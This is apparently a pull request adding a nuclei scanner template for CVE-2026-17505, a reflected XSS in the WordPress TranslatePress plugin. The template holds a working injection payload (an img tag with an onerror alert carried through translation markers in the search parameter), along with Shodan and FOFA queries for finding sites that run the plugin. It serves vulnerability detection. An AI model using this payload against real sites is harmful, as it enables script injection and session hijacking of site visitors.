### PR TITLE
Add CVE-2026-17505.yaml - WordPress TranslatePress < 3.2.6 - Unauthenticathed Reflected XSS

### DIFF
--- a/http/cves/2026/CVE-2026-17505.yaml
+++ b/http/cves/2026/CVE-2026-17505.yaml
@@ -28,16 +28,16 @@ info:
   tags: cve,cve2026,wordpress,wp-plugin,wp,translatepress,xss
 
 flow: http(1) && http(2)
- 
+
 http:
   - raw:
       - |
         GET / HTTP/1.1
         Host: {{Hostname}}
- 
+
     host-redirects: true
     max-redirects: 3
- 
+
     matchers:
       - type: dsl
         dsl:
@@ -45,7 +45,7 @@ http:
           - 'contains(body, "translatepress") || contains(body, "trp-language-switcher")'
         condition: and
         internal: true
- 
+
     extractors:
       - type: regex
         name: lang
@@ -54,12 +54,12 @@ http:
         internal: true
         regex:
           - 'rel="alternate"\s+hreflang="[a-zA-Z-]+"\s+href="https?://[^/"]+/([a-z]{2,3})/"'
- 
+
   - raw:
       - |
         GET /{{lang}}/?s=%23!trpst%23img%20src=x%20onerror=alert(document.domain)%23!trpen%23 HTTP/1.1
         Host: {{Hostname}}
- 
+
     matchers-condition: and
     matchers:
       - type: word
@@ -68,7 +68,7 @@ http:
           - '<img src="x" onerror="alert(document.domain)">'
           - 'search'
         condition: and
- 
+
       - type: status
         status:
           - 200

--- a/http/cves/2026/CVE-2026-17505.yaml
+++ b/http/cves/2026/CVE-2026-17505.yaml
@@ -1,0 +1,74 @@
+id: CVE-2026-17505
+
+info:
+  name: WordPress TranslatePress < 3.2.6 - Unauthenticathed Reflected XSS
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    TranslatePress plugin < 3.2.6 for WordPress contains a reflected cross-site scripting vulnerability in the translation marker processing feature, letting attackers inject and execute arbitrary JavaScript code, exploit requires no authentication or privileges.
+  impact: |
+    Attackers can execute arbitrary JavaScript in victim browsers, leading to session hijacking and account takeover.
+  remediation: |
+    Update to version 3.2.6 or later of TranslatePress plugin.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-17505
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2026-17505
+    cwe-id: CWE-79
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: cozmoslabs
+    product: translatepress-multilingual
+    framework: wordpress
+    shodan-query: http.html:"translatepress"
+    fofa-query: body="translatepress"
+  tags: cve,cve2026,wordpress,wp-plugin,wp,translatepress,xss
+
+flow: http(1) && http(2)
+ 
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+ 
+    host-redirects: true
+    max-redirects: 3
+ 
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "translatepress") || contains(body, "trp-language-switcher")'
+        condition: and
+        internal: true
+ 
+    extractors:
+      - type: regex
+        name: lang
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'rel="alternate"\s+hreflang="[a-zA-Z-]+"\s+href="https?://[^/"]+/([a-z]{2,3})/"'
+ 
+  - raw:
+      - |
+        GET /{{lang}}/?s=%23!trpst%23img%20src=x%20onerror=alert(document.domain)%23!trpen%23 HTTP/1.1
+        Host: {{Hostname}}
+ 
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<img src="x" onerror="alert(document.domain)">'
+          - 'search'
+        condition: and
+ 
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-17505.yaml
+++ b/http/cves/2026/CVE-2026-17505.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-17505
 
 info:
-  name: WordPress TranslatePress < 3.2.6 - Unauthenticathed Reflected XSS
+  name: WordPress TranslatePress < 3.2.6 - Cross-Site Scripting
   author: 0x_Akoko
   severity: medium
   description: |


### PR DESCRIPTION
Added CVE-2026-17505 details for WordPress TranslatePress plugin vulnerability, including description, impact, remediation, and HTTP request flow.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
